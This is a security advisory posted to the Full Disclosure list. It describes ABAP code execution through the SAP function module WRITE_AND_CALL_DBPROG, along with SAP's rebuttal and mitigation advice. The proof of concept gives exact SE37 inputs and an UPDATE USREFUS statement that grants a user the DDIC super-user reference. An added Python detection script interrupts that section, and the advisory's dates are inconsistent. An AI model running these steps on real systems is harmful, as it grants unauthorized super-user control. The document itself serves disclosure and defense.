nullFaktor Security Advisory < 20250719 >
===========================================================

Title:            ABAP Code Execution via Internal Function Module WRITE_AND_CALL_DBPROG
Vulnerability:    Exposed Dangerous Functionality
Product:          SAP NetWeaver S/4HANA
Homepage:         http://www.sap.com
Affected Version: S/4HANA, SAP_BASIS 757 SP 3
SAP Note:         3546011
Impact:           High
CVSS 4.0 Vector:  CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVSS 4.0 Score:   8.4
CWE:              CWE-749: Exposed Dangerous Method or Function
                  CWE-94: Improper Control of Generation of Code ('Code Injection')
Date:             2025-10-07
Author:           Raschin Tavakoli | nullFaktor GmbH
                  https://www.nullfaktor.com
                  office at nullfaktor dot com
Blog:             https://www.nullfaktor.com/blog #Advisory_09-07-25
===========================================================

Vendor description:
===================
SAP SE is a European multinational software company based in Walldorf,
Baden-Württemberg, Germany. It develops enterprise software to manage
business operations and customer relations. The company is the world's
largest enterprise resource planning (ERP) software vendor.

Timeline:
=========
06.09.2024  nullFaktor initial contact to SAP
11.09.2024  First response from SAP PSRT. SAP informs us that they do not
            consider the issue a security vulnerability
12.09.2024  nullFaktor responds via email with more detailed information
07.11.2024  SAP responds with an email containing a rebuttal, explaining why
            they still do not consider this issue a security vulnerability
07.11.2024  nullFaktor responds via email with further arguments
13.12.2024  SAP responds via email and asks for a video call
13.01.2025  nullFaktor responds via email regarding the video call
05.02.2025  Video call with SAP. nullFaktor acknowledges SAP's reasoning, and
            both parties agree that, in a properly maintained system, the
            issue does not pose a security risk. SAP gives the green light
            for public disclosure of the issue, but requests that customers
            be made aware of their reasoning.
02.07.2025  nullFaktor sends final draft to SAP via email
10.07.2025  Advisory release

Vulnerability
===============
During our security research into internal SAP® code in SAP® S/4HANA, we
identified that the function module WRITE_AND_CALL_DBPROG in function group
SDB2 exposes dangerous functionality that allows users to execute arbitrary
Native SQL. Furthermore, the SQL code is written into a report using INSERT
REPORT and then executed dynamically - without any input validation or
authorization checks being performed. This behavior enables ABAP code
injection and arbitrary code execution within the SAP system.

The prerequisite for exploiting this vulnerability is authorization to
execute local function modules, which always includes the S_DEVELOP
authorization with ACTVT = 16 (Execute). According to SAP, this authorization
should never be assigned in production systems. Therefore, SAP does not
classify this as a security vulnerability.

However, in our opinion, the issue is still relevant from a security
perspective. In practice, authorizations in large SAP environments are often
misconfigured or overly permissive - it cannot be assumed that all users
(sometimes thousands) are configured strictly enough to prevent misuse. A
potentially malicious user could exploit this function module to bypass
multiple critical security controls, such as:

1. Bypassing ANY authorization restrictions: Arbitrary data can be read,
   modified, or deleted in the database, effectively resulting in full system
   compromise and potentially affecting connected systems as well.
2. Inserting custom code into the SAP namespace: The attacker can write ABAP
   code into standard namespaces (e.g., by creating new reports).
3. Bypassing system/client modifiability locks: Code changes can be
   introduced even when the system or client is set to "not modifiable."

Hence, giving access to local function module execution (for example via
SE37 or SE80 and S_DEVELOP/ACTVT=16) is equivalent to granting SAP_ALL. As
such, the distinction between S_DEVELOP/ACTVT=16 and SAP_ALL becomes largely
meaningless from an attacker's perspective.

Furthermore, the issue is also relevant for non-productive systems, for
example if developers or testers are not subject to additional restrictions
on the S_DEVELOP authorization (such as OBJNAME, DEVCLASS, etc.).

Currently, there is no patch available to address this issue. It is
therefore strongly recommended to review user authorizations and ensure that
no users have access to transaction SE37 in combination with S_DEVELOP /
ACTVT = 16 (Execute) on production systems. On non-production systems, the
corresponding object types must also be defined in detail.

Feedback from SAP
=================
No user in a production system should have S_DEVELOP with ACTVT 16 assigned.
Therefore SAP does not consider this issue a vulnerability and no patch will
be released.

For every developer, the S_DEVELOP authorization must be fully and carefully
maintained. Unfortunately, in SAP on-premise environments, it is not
sufficient to restrict only the activity (ACTVT). The corresponding object
types must also be defined in detail, depending on what the developer should
be allowed to create, modify, delete, or test.

Please also refer to https://me.sap.com/notes/3546011

Attack Scenario
===============
A local attacker with privileges to execute local function modules (for
example via SE80 or SE37) can inject arbitrary ABAP code, enabling them to
bypass any security restrictions and compromise the system.

Proof of Concept
================
To demonstrate the issue, we showcase that we are able to execute arbitrary
commands. For the proof of concept, we want to add the reference user DDIC
(Super User) to our current user DEVELOPER.
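Two defender-side checks that follow from the recommendation above and from the USREFUS change demonstrated in the proof of concept, as an added example (not nullFaktor's or SAP's code): the first flags roles that grant S_DEVELOP with ACTVT 16 while leaving OBJTYPE, OBJNAME or DEVCLASS at "*", the second compares two USREFUS snapshots and reports users that gained a reference user, marking DDIC and SAP* as super-user grants. The rows are constructed in the shape of an AGR_1251 export (role authorization values: role, object, authorization, field, low, high) and of USREFUS (MANDT, BNAME, REFUSER, USERALIAS); the role names, authorization ids and the reference user Z_REF_BW are made up, and reading the tables out of a real system (SE16 export, RFC read) is assumed and not shown.

```python
"""Defender-side checks for the S_DEVELOP ACTVT 16 prerequisite and for
reference-user changes in USREFUS. Added example; table rows are constructed."""

from dataclasses import dataclass

EXECUTE = "16"                            # S_DEVELOP ACTVT 16 = Execute
PRIVILEGED_REFUSERS = {"DDIC", "SAP*"}    # reference users that amount to super-user
RESTRICTING_FIELDS = ("OBJTYPE", "OBJNAME", "DEVCLASS")


@dataclass(frozen=True)
class AuthValue:
    """One row of a role's authorization values (shape of AGR_1251)."""
    agr_name: str     # role
    obj: str          # authorization object, e.g. S_DEVELOP
    auth: str         # authorization instance within the role (constructed ids)
    fld: str          # field of the object: ACTVT, OBJTYPE, OBJNAME, DEVCLASS, ...
    low: str          # single value or lower bound of a range
    high: str = ""    # upper bound of a range, empty for single values


@dataclass(frozen=True)
class RefUser:
    """One row of the reference-user table USREFUS."""
    mandt: str
    bname: str
    refuser: str = ""
    useralias: str = ""


def _group_s_develop(rows):
    """Collect field values of every S_DEVELOP authorization, keyed by (role, auth)."""
    grouped = {}
    for r in rows:
        if r.obj == "S_DEVELOP":
            grouped.setdefault((r.agr_name, r.auth), {}).setdefault(r.fld, set()).add((r.low, r.high))
    return grouped


def _grants_execute(values):
    """True if ACTVT contains 16 as a value, as part of a range, or as '*'."""
    for low, high in values.get("ACTVT", set()):
        if low in ("*", EXECUTE) or (high and low <= EXECUTE <= high):
            return True
    return False


def _is_wildcard(values, fld):
    """True if the field carries the unrestricted value '*'."""
    return any(low == "*" for low, _ in values.get(fld, set()))


def find_broad_execute_grants(rows):
    """Return (role, auth, unrestricted_fields) for S_DEVELOP grants with ACTVT 16
    whose object type, name or package is not narrowed down."""
    findings = []
    for (role, auth), values in sorted(_group_s_develop(rows).items(), key=lambda kv: kv[0]):
        if _grants_execute(values):
            open_fields = [f for f in RESTRICTING_FIELDS if _is_wildcard(values, f)]
            if open_fields:
                findings.append((role, auth, open_fields))
    return findings


def detect_new_refusers(before, after):
    """Diff two USREFUS snapshots; return (client, user, refuser, is_privileged)
    for every user that gained or changed a reference user."""
    previous = {(r.mandt, r.bname): r.refuser for r in before}
    changes = []
    for r in after:
        if r.refuser and r.refuser != previous.get((r.mandt, r.bname), ""):
            changes.append((r.mandt, r.bname, r.refuser, r.refuser in PRIVILEGED_REFUSERS))
    return changes


# Constructed role data: one wide-open role, one display-only role, one with a
# range on ACTVT, one properly narrowed to Z* programs in package ZDEV.
SAMPLE_AGR_1251 = [
    AuthValue("Z_DEV_ALL", "S_DEVELOP", "T-0001", "ACTVT", "16"),
    AuthValue("Z_DEV_ALL", "S_DEVELOP", "T-0001", "OBJTYPE", "*"),
    AuthValue("Z_DEV_ALL", "S_DEVELOP", "T-0001", "OBJNAME", "*"),
    AuthValue("Z_DEV_ALL", "S_DEVELOP", "T-0001", "DEVCLASS", "*"),
    AuthValue("Z_DEV_DISPLAY", "S_DEVELOP", "T-0002", "ACTVT", "03"),
    AuthValue("Z_DEV_DISPLAY", "S_DEVELOP", "T-0002", "OBJTYPE", "*"),
    AuthValue("Z_DEV_DISPLAY", "S_DEVELOP", "T-0002", "OBJNAME", "*"),
    AuthValue("Z_DEV_DISPLAY", "S_DEVELOP", "T-0002", "DEVCLASS", "*"),
    AuthValue("Z_DEV_RANGE", "S_DEVELOP", "T-0003", "ACTVT", "01", "99"),
    AuthValue("Z_DEV_RANGE", "S_DEVELOP", "T-0003", "OBJTYPE", "*"),
    AuthValue("Z_DEV_RANGE", "S_DEVELOP", "T-0003", "OBJNAME", "*"),
    AuthValue("Z_DEV_RANGE", "S_DEVELOP", "T-0003", "DEVCLASS", "ZDEV"),
    AuthValue("Z_DEV_ZPROG", "S_DEVELOP", "T-0004", "ACTVT", "16"),
    AuthValue("Z_DEV_ZPROG", "S_DEVELOP", "T-0004", "OBJTYPE", "PROG"),
    AuthValue("Z_DEV_ZPROG", "S_DEVELOP", "T-0004", "OBJNAME", "Z*"),
    AuthValue("Z_DEV_ZPROG", "S_DEVELOP", "T-0004", "DEVCLASS", "ZDEV"),
    AuthValue("Z_DEV_ZPROG", "S_TCODE", "T-0005", "TCD", "SE37"),   # other object, ignored
]

# USREFUS rows as shown in the proof of concept, plus one constructed benign change.
USREFUS_BEFORE = [RefUser("001", u) for u in
                  ("BWDEVELOPER", "DDIC", "DEVELOPER", "DEVELOPER_5", "SAP*", "SDMI_DLRYYAU")]
USREFUS_AFTER = [
    RefUser("001", "BWDEVELOPER", "Z_REF_BW"),    # constructed, ordinary reference user
    RefUser("001", "DDIC"),
    RefUser("001", "DEVELOPER", "DDIC"),          # the change produced by the PoC
    RefUser("001", "DEVELOPER_5"),
    RefUser("001", "SAP*"),
    RefUser("001", "SDMI_DLRYYAU"),
]

if __name__ == "__main__":
    for role, auth, fields in find_broad_execute_grants(SAMPLE_AGR_1251):
        print(f"{role} ({auth}): S_DEVELOP ACTVT 16 with unrestricted {', '.join(fields)}")
    for mandt, bname, refuser, privileged in detect_new_refusers(USREFUS_BEFORE, USREFUS_AFTER):
        print(f"client {mandt}: {bname} gained reference user {refuser}"
              f" [{'SUPER USER' if privileged else 'review'}]")
```

The role check treats only a literal "*" as unrestricted; a pattern such as Z* counts as a restriction, which matches the advisory's point that OBJNAME and DEVCLASS need to be maintained in detail rather than merely present. The snapshot diff is cheap enough to run after every transport or change-document review, and a hit on DDIC or SAP* is the exact trace the proof of concept leaves behind.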
The following shows the content of table USREFUS before executing the
exploit (can be viewed for example via transaction SE16):

MANDT  BNAME         REFUSER  USERALIAS
001    BWDEVELOPER
001    DDIC
001    DEVELOPER
001    DEVELOPER_5
001    SAP*
001    SDMI_DLRYYAU

In the next step, the local function module WRITE_AND_CALL_DBPROG is opened
via transaction SE37. The following values are entered into the form fields
(input parameters) of the function module:

NO_EXEC      = ""
PRID         = "0"
PROGNAME     = "Z_HACKED"
MAX_SEVERITY = "E"
ABAP_FLAG    = "X"
DBCON_NAME   = "X"
STMT         = "X"

The following value is entered into the table parameter (input parameter)
STATEMENTS:

STATEMENTS = "UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'DEVELOPER'."

After executing the function module, a report called "Z_HACKED" is created
and executed. The code of the generated report is as follows:

PROGRAM Z_HACKED.
FORM GENFORM USING RC.
  UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'DEVELOPER'.
  RC = 0.
ENDFORM.

Executing this code successfully attaches the REFUSER DDIC to the user
DEVELOPER, effectively granting super user privileges. Via SE16 we can see
the changed content of table USREFUS:

MANDT  BNAME         REFUSER  USERALIAS
001    BWDEVELOPER
001    DDIC
001    DEVELOPER     DDIC
001    DEVELOPER_5
001    SAP*
001    SDMI_DLRYYAU

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
About nullFaktor

nullFaktor is an Austrian Cyber Security company offering services such as
Penetration Testing, Cyber Defense, and IT Security Consulting. In addition,
nullFaktor runs a dedicated SAP Security Division focused on SAP Cyber
Security. Services include SAP Penetration Testing as well as strategic SAP
Security Advisory. Ongoing research activities strengthen nullFaktor's
consulting and assessment services by ensuring up-to-date knowledge of modern
attack vectors, misconfigurations, and pitfalls in secure architecture
patterns. This enables clients to make informed decisions and improve their
IT security posture based on real-world risk scenarios.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Want to strengthen your IT or SAP security posture?
Get in touch at https://www.nullfaktor.com/#kontakt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail:  office at nullfaktor dot com
Web:   https://www.nullfaktor.com
Blog:  https://www.nullfaktor.com/blog
X.com: https://x.com/_nullfaktor

EOF Raschin Tavakoli / @2025

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/